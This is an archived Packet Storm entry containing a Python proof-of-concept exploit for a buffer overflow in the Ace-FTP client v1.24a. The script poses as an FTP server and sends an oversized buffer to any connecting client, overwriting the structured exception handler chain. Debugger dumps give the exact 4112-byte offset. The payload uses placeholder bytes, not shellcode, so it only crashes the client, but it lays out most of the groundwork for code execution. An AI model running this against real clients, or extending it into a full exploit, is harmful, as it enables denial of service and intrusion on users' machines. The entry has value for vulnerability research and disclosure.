aceftp-dos.txt

2007-06-11T00:00:00
ID PACKETSTORM:57113
Type packetstorm
Reporter n00b
Modified 2007-06-11T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#######################################################################  
#Credit to n00b for finding the bug.  
#Ace-Ftp client buffer over flow p0c.  
#This is possible to exploit as we   
#Smash the seh handlers and there are  
#Plenty of registers that had our buffer  
#Im still new to seh over writes I haven't   
#Had much experience with the seh over write  
#But get the Idea from what I've read about  
#It..Any way this script creates a listening   
#Socket and act's as a ftp server then when the   
#Client connect's a huge buffer is sent back to  
#The client.Resulting and a buffer overflow.  
#If any one feel's like investigating or writing  
#A poc for this please do so give some credits to   
#n00b.I will give it a try during the week.  
#######################################################################  
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre  
#######################################################################  
#Tested:Win xp sp2.  
#Version Affected: v1.24a.  
###################################################  
# \\Debug info//  
###################################################  
#Program received signal SIGSEGV,Segmentation fault.  
#[Switching to thread 1312.0x714]  
#0x00403c58 in ?? ()  
#  
#(gdb) i r  
#  
#eax 0x41414141 1094795585 <----Eax over written..  
#ecx 0x0 0  
#edx 0xa5b464 10859620  
#ebx 0x41414141 1094795585 <----Ebx over written..  
#esp 0x12e458 0x12e458  
#ebp 0x12f48c 0x12f48c  
#esi 0x12e488 1238152  
#edi 0xa5b464 10859620  
#eip 0x403c58 0x403c58  
#eflags 0x10206 66054  
#cs 0x1b 27  
#ss 0x23 35  
#ds 0x23 35  
#es 0x23 35  
#fs 0x3b 59  
#gs 0x0 0  
#fctrl 0xffff1272 -60814  
#fstat 0xffff0000 -65536  
#ftag 0xffffffff -1  
#fiseg 0x0 0  
#fioff 0x0 0  
#foseg 0xffff0000 -65536  
#fooff 0x0 0  
###################################################  
#What the register look like after crash..  
###################################################  
#EAX 41414141  
#ECX 00000000  
#EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA  
#EBX 41414141  
#ESP 0012E458  
#EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC  
#ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA  
#EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA  
#EIP 00403C58   
###################################################  
#DS:[41414141]=???  
#EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)  
#MOV EDX,DWORD PTR DS:[EAX]  
###################################################  
#SEH chain of main thread  
#Address SE handler  
#---------------------------  
#0012E46C AceXFTP.00430B9E  
#45454545  
#---------------------------  
#0012F498 44444444 Pointer to next SEH record  
#0012F49C 45454545 SE handler  
#  
#4112byte's to over write Pointer to next SEH record  
#next 4 bytes over writes se handler.  
###################################################  
  
  
from socket import *  
from struct import pack  
  
host = "127.0.0.1 "  
port = 21  
  
Size_of_buf1 = 4112   
Size_of_buf2 = 550  
  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind((host, port))  
s.listen(1)  
print "\nPort %d open Waiting !!!! ..." % port  
  
cl, addr = s.accept()  
print "Vic is connected %s" % addr[0]  
  
buf1 = "A" * Size_of_buf1   
  
NEXT_SEH_RECORD = "\x44\x44\x44\x44"  
  
SE_HANDLER = "\x45\x45\x45\x45"   
  
buf2 = "C" * Size_of_buf2  
  
End = "\r\n"   
  
cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)  
print "mission accomplished : OK\n"  
  
sleep(3)  
cl.close()  
s.close()  
  
  
`